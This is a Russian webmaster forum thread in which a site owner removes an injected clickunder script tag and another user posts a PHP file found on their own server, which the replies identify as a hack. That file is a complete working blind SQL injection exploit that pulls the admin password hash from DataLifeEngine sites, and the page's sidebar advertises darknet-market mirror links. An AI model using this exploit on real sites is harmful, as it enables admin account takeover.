Помогите найти код!
Страницы: 1
Помогите найти код!
Здравствуйте, уважаемые Форумчане! Уже неоднократно обращалась к вам за помощью и знаю, что здесь много отзывчивых людей. Суть проблемы такова: буквально  прошло пару дней, как обнаружила на сайте наличие кликандера, кто-то вероятно взломал сайт и установил его. При нажатии на категорию вылазит сайт velcome-club точка com. Больше ничего вроде не изменилось. После появления этого кода сильно просел трафик. Не могу найти этот код на сайте. Может кто-то подскажет, где можно посмотреть или каким образом его отыскать? Заранее благодарна! Сайт: http://allsofts2009.ucoz.ru/
Изменено: Оксана - 16 Марта 2012 13:19
Спросите на форуме юкоза webanet вам наверняка поможет!smile:)
Цитата
<script language="javascript" src="http://uno.wt-rotator.biz/?t=rot&noadult=1&pid=49901"></script>
[COLOR=#373737]Данный код случайно не может оказаться этой какой?[/COLOR]
Спасибо, Лилия! Обязательно спрошу smile:)
Цитата
Оксана пишет:
Цитата
<script language="javascript" src="http://uno.wt-rotator.biz/?t=rot&noadult=1&pid=49901 (http://\"http://uno.wt-rotator.biz/?t=rot&noadult=1&pid=49901\")"></script>
[COLOR=#373737]Данный код случайно не может оказаться этой какой?[/COLOR]
это и есть, код этот от
визард-трафик wt-rotator   
визард-банерс  wb-rotator
Перенес тему в наиболее подходящий раздел.
Спасибо огромное! Нашла, удалила. Только не пойму код этот устанавливается только на главной? Вроде все перерыла, нигде больше не увидела. И можно ли как-то защититься от этих взломов?
Цитата
Оксана пишет:
защититься от этих взломов?
Смените пароль, установите лицензионный антивирус, не скачивайте кейгены и т.п. приложения, по чаще делайте бэкапы дизайна и всего сайта
Изменено: Number724 - 17 Марта 2012 12:05
Уважаемая Оксана!Аккаунт злоумышленника забанен в нашей системе. Спасибо, за проявленную бдительность!
код мог вставить кто-то у кого есть админские права на вход в панель управления сайтом на укозе. код как правило вставляется в шаблон главной страницы
Доступа ни у кого не было 100%. Не знаю каким образом, но сайт взломали и установили код. Я замечала, что происходит что-то странное, приходилось по несколько раз заходить в админку, но как-то не сильно обращала внимание. А зря!
обязательно меняйте пароль чаще и так, чтобы в пароле были и буквы и цифры. пароли от админки и от аккаунта на том же сайте должны быть разными, ну и свой комп берегите, т.к. если у вас заведтся червь-кейлоггер, то пароль от админки будет самой просто и безобидной потерей в отличии от сугубо личной Вашей информации smile:)
ребята на на сайте файл с названием 111.php и вот с таким содержанием 


Код
<html> 
  
        <head> 
                <title>DataLifeEngine Online Mod Exploit Blind SQL Injection</title> 
                <style type="text/css"> 
                        body{ 
                                font-family: Tahoma; 
                                font-size: 12px; 
                                color: #e1e1e1; 
                                background-color: #222; 
                        } 
                </style> 
        </head> 
         
        <body> 
                <center> 
                <form method="post" action="<?php echo $_SERVER['SCRIPT_NAME']?>"> 
                      dle path:<input type="text" name="server" value="localhost/dle/" /> 
                        <br/><br/> 
                       admin id:  <input type="text" name="userid" value="1" /> 
                        <br/><br/> 
                        <input type="submit" /> 
                </form> 
                </center> 
        </body> 
  
</html> 
  
<?php 
if (!empty($_POST)) 
{ 
        $_      = create_function('$error', 'die("$error";'); 
        $userid         = isset($_POST['userid'&#93 ? (int) $_POST['userid'] : null; 
        $server  = isset($_POST['server'&#93 ? $_POST['server'] : null; 
        $alphabet   = array('a', 'b', 'c', 'd', 'e', 'f', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0'); 
        $responce       = null; 
        $password       = null; 
        $curpos  = 1; 
        $alppos     = 0; 
        $flag       = false; 
         
         
        $pathinfo = parse_url($server); 
        if (false === is_array($pathinfo) or empty($pathinfo['host'&#93) { 
                $_('invalid url'); 
        } else { 
                $fsocket = fsockopen($pathinfo['host'], 80) or  
                        $_('hostname is dead'); 
                $request = "GET {$pathinfo['path']} HTTP/1.1\r\n" 
                                 . "Host: {$pathinfo['host']}\r\n" 
                                 . "Cookie: dle_onl_session='underWHAT?!\r\n\r\n"; 
                fwrite($fsocket, $request) or  
                        $_ ('failed to write data to socket'); 
                while ($flag === false){ 
                                        $responce .= fread($fsocket, 128); 
                                        $flag = strpos($responce, '</html>') ? true: false; 
                } 
        $flag = false; 
                if (strpos($responce, 'MySQL Error') > 0){ 
                        while (strlen($password) < 32) 
                        { 
                                $fsocket = fsockopen($pathinfo['host'], 80) or  
                                        $_('hostname is dead');  
                                $responce = null; 
                                $cookie   = "' or 1=if(substring((select password from dle_users where user_id = $userid),$curpos,1)='{$alphabet[$alppos]}',1,(select 1 union select 3))/*"; 
                                $request  = "GET {$pathinfo['path']} HTTP/1.1\r\n" 
                                                  . "Host: {$pathinfo['host']}\r\n" 
                                                  . "Connection: close\r\n" 
                                                  . "Cookie: dle_onl_session=$cookie\r\n\r\n"; 
                                fwrite($fsocket, $request) or  
                                        $_ ('failed to write data to socket'); 
                                $responce = fread($fsocket, 8000); 
                                if (!strpos($responce, 'returns more than 1 row')){ 
                                        $password .= $alphabet[$alppos]; 
                                        $curpos += 1; 
                                        $alppos = 0; 
                                } else { 
                                        $alppos += 1; 
                                } 
                                $flag     = false; 
                                $responce = null; 
                                fclose($fsocket); 
                        } 
                } else { 
            die ('<center><h1>not vulnerable</h1></center>'); 
        } 
                echo "<center><h1>$password</h1></center>";                                
        } 
} 
  
    
?>




скажите что за
Цитата
kashin пишет:
скажите что за

Взлом. Удаляйте.
О сколько нам открытий чудных готовит продвиженья путь:
И Google, сын ошибок трудных, и Yandex, парадоксов друг :)
Дешёвый хостинг для новичков и про
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
18:49 КАК ЗАЙТИ НА КРAКЕН? ССЫЛКИ В 2025 : Список рабочих ссылок 
18:48 КАК ЗАЙТИ НА КРAКЕН? ССЫЛКИ В 2025 : Список рабочих ссылок 
18:48 КАК ЗАЙТИ НА КРAКЕН? ССЫЛКИ В 2025 : Список рабочих ссылок 
18:45 ССЫЛКА НА KРАКЕН (КRAKEN)? Обновлённые новые ссылки на Kракен 2025: ОБНОВЛЁННЫЙ список ЗЕРКАЛ И ССЫЛОК! ССЫЛКА kракен 
18:40 ССЫЛКА НА KРАКЕН (КRAKEN)? Обновлённые новые ссылки на Kракен 2025: ОБНОВЛЁННЫЙ список ЗЕРКАЛ И ССЫЛОК! ССЫЛКА kракен 
18:39 КРАКЕН или! KRAKEN !! Все Ссылки 2025 : Список Рабочих Ссылок и Зеркал Для Безопасного Входа в KRAKEN + Рекомендации 
18:38 ССЫЛКА НА KРАКЕН (КRAKEN)? Обновлённые новые ссылки на Kракен 2025: ОБНОВЛЁННЫЙ список ЗЕРКАЛ И ССЫЛОК! ССЫЛКА kракен 
17:31 SpaceSwap.cc - Быстрый и надежный обменник криптовалют 
17:15 swapsfera.com 
17:09 GoodsMoney.io 
15:46 Запустите свой обменник за 1 день без программиста и серверов — облачная платформа EX365 
10:54 PonyBit.ru - обменный пункт PonyBit.ru (Понибит.ру) 
10:07 BestChange – обменивать электронную валюту можно быстро и выгодно 
07:42 CoinCapital  
17:31 Список обновленных тем пуст... 
12:49 Всего п онемногу 
12:45 Куплю проигрышные букмекерские аккаунты 
11:55 Union Pharm - топовая фарма-партнерка для профессионалов! 
17:09 Точные прогнозы на футбол 
10:00 Ну что, кто куда деваете свои сайты? 
16:22 Компьютерная мышь